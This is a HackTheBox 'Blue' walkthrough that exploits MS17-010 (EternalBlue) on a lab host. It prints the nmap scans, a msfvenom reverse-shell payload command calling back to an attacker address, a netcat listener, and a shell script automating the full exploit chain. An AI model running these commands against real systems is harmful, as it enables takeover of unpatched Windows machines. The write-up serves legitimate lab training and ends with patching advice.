I know there are plenty of well-documented, detailed write-ups about most, if not all, of the retired and active boxes on HTB. Most of the write-ups I post will be quick and straight to the point, covering my methods for reconnaissance, scanning and enumeration of services, exploitation, and some post-exploitation/flag grabbing.
Blue is an easy Windows box that can be exploited with a very well-known exploit. It is a pretty trivial box if you know what to look for. With that being said, let's jump right in!
As always, I am going to run my initial nmap scan:
nmap -sC -sV -A -O -v -oA Scan/init 10.10.10.40
Taking the nmap flags above in order: -sC runs the default script set against the target; -sV probes each open port for the service name and version; -A is the aggressive option, which turns on OS detection, version detection, default scripts and traceroute (so it already implies -sC, -sV and -O, and the explicit -O is redundant but harmless); -v makes nmap verbose; and -oA writes the results in all three output formats (normal, XML and grepable) under the given base name. Here Scan is the directory and init is the base name, so the initial scan results land in Scan/init.nmap, Scan/init.xml and Scan/init.gnmap.
After the initial scan we see the following open ports:
Ports 139 and 445 (NetBIOS/SMB) jump out. Let's see whether these services are vulnerable. I am going to run nmap's vuln script category against the target to see if there are any known vulnerabilities associated with the NetBIOS/SMB ports. Note that the vuln category includes some intrusive scripts, so on a fragile production host you would narrow it to the single script you care about (here, smb-vuln-ms17-010) rather than the whole category.
nmap --script=vuln -p 139,445 10.10.10.40
The smb-vuln-ms17-010 script reports that the target is vulnerable to MS17-010, aka EternalBlue. MS17-010 is the Microsoft bulletin (and patch) for the SMBv1 flaws, released in March 2017; EternalBlue is the exploit for them, developed by the NSA and leaked by the Shadow Brokers in April 2017, a month after the patch shipped. It was devastating in practice, being the spreading mechanism behind WannaCry and NotPetya later that year.
MS17-010 can be exploited in different ways, either manually or with Metasploit. I am going to download the exploit from GitHub using Helvio Junior's MS17-010 repository. Once downloaded, you see the different exploit scripts, as seen below:
With the repository downloaded, we can use msfvenom to create our payload, an executable that gives us a reverse shell when the exploit runs it on the target.
Make sure you start a netcat listener in a new tab or window, on the same port you gave msfvenom as LPORT:
nc -nvlp 1337
Time for the fun part, exploitation! To ensure this works, you will need to use Python 2 (and a Python 2 build of impacket, which the repository's SMB helper code imports). If you use Python 3 without manually changing some of the code to be compatible with it, you will have issues.
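The whole Blue workflow from the vulnerability check through the payload and the exploit run, as an added shell example (this is not code from the original write-up, nor from Helvio Junior's repository). It wraps each step in a function so the nmap verdict is parsed from the saved output before anything is fired, and it defaults to a dry run that only prints the commands. Assumptions, which are not on the page: the attacker address in LHOST, the payload file name, the use of -Pn and the single smb-vuln-ms17-010 script for the re-check, and that send_and_execute.py is invoked as "python2 send_and_execute.py <target> <exe>".

```shell
#!/bin/sh
# Added example, not code from the original write-up or from the MS17-010
# repository: the Blue workflow as shell functions, so the vulnerability
# state is checked from saved nmap output before anything is launched.
# Assumptions (not from the page): the attacker address LHOST, the payload
# file name, and that send_and_execute.py from Helvio Junior's MS17-010
# repository is invoked as "python2 send_and_execute.py <target> <exe>".
# DRY_RUN=1 (the default) only prints each command; DRY_RUN=0 executes it.
set -u

TARGET="${TARGET:-10.10.10.40}"       # Blue's address from the write-up
LHOST="${LHOST:-10.10.14.2}"          # assumed HTB VPN address; set your own
LPORT="${LPORT:-1337}"                # listener port used in the write-up
PAYLOAD="${PAYLOAD:-ms17-010.exe}"    # assumed payload file name
DRY_RUN="${DRY_RUN:-1}"

run_cmd() {                           # print a command; run it only when DRY_RUN=0
    printf '[cmd] %s\n' "$1"
    if [ "$DRY_RUN" = "0" ]; then eval "$1"; fi
}

# Narrow the re-check to the one NSE script the vuln category used to find
# the issue, and save all output formats so the verdict can be parsed.
scan_cmd() {
    printf 'nmap -Pn -p 139,445 --script smb-vuln-ms17-010 -oA Scan/ms17 %s' "$TARGET"
}

# Read the script's verdict from nmap normal output (the .nmap file of -oA).
# smb-vuln-ms17-010 prints "State: VULNERABLE" when the target answers the
# SMBv1 probe the way unpatched hosts do. No script block at all usually
# means SMB was unreachable or SMBv1 is disabled; that is reported as UNKNOWN.
ms17_010_state() {
    file="$1"
    if ! grep -q 'smb-vuln-ms17-010' "$file"; then
        echo UNKNOWN
    elif grep -q 'State: VULNERABLE' "$file"; then
        echo VULNERABLE
    elif grep -q 'State: NOT VULNERABLE' "$file"; then
        echo NOT_VULNERABLE
    else
        echo UNKNOWN
    fi
}

# Unstaged reverse shell: nothing to stage back from Metasploit, so a plain
# netcat listener is enough. Blue is x64 but runs 32-bit executables fine.
payload_cmd() {
    printf 'msfvenom -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -f exe -o %s' \
        "$LHOST" "$LPORT" "$PAYLOAD"
}

listener_cmd() {
    printf 'nc -nvlp %s' "$LPORT"
}

# Python 2 is required, as the write-up says: the repository's SMB helper
# code and the impacket build it expects are Python 2 only.
exploit_cmd() {
    printf 'python2 send_and_execute.py %s %s' "$TARGET" "$PAYLOAD"
}

main() {
    if [ "$DRY_RUN" = "0" ]; then mkdir -p Scan; fi
    run_cmd "$(scan_cmd)"
    if [ "$DRY_RUN" = "0" ]; then
        state=$(ms17_010_state Scan/ms17.nmap)
        if [ "$state" != "VULNERABLE" ]; then
            echo "MS17-010 state is $state, not launching the exploit" >&2
            return 1
        fi
    fi
    run_cmd "$(payload_cmd)"
    echo "# start the listener in a second terminal before the next step:"
    listener_cmd; echo
    run_cmd "$(exploit_cmd)"
}

main
```

Run it as-is to see the command sequence, then `DRY_RUN=0 LHOST=<your tun0 address> ./blue.sh` from the directory containing send_and_execute.py to execute it; the gate on the parsed nmap verdict is what stops the exploit from being thrown at a host where the SMBv1 check did not come back VULNERABLE.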
Voilà! The exploit worked and now I have SYSTEM privileges.
This was an easy box to exploit, but it shows why it is important to keep systems up to date with the latest patches. The fix here is the MS17-010 patch plus disabling SMBv1 wherever nothing still needs it. Also, never expose NetBIOS/SMB to the internet unless you want someone to test your systems "free of charge" :).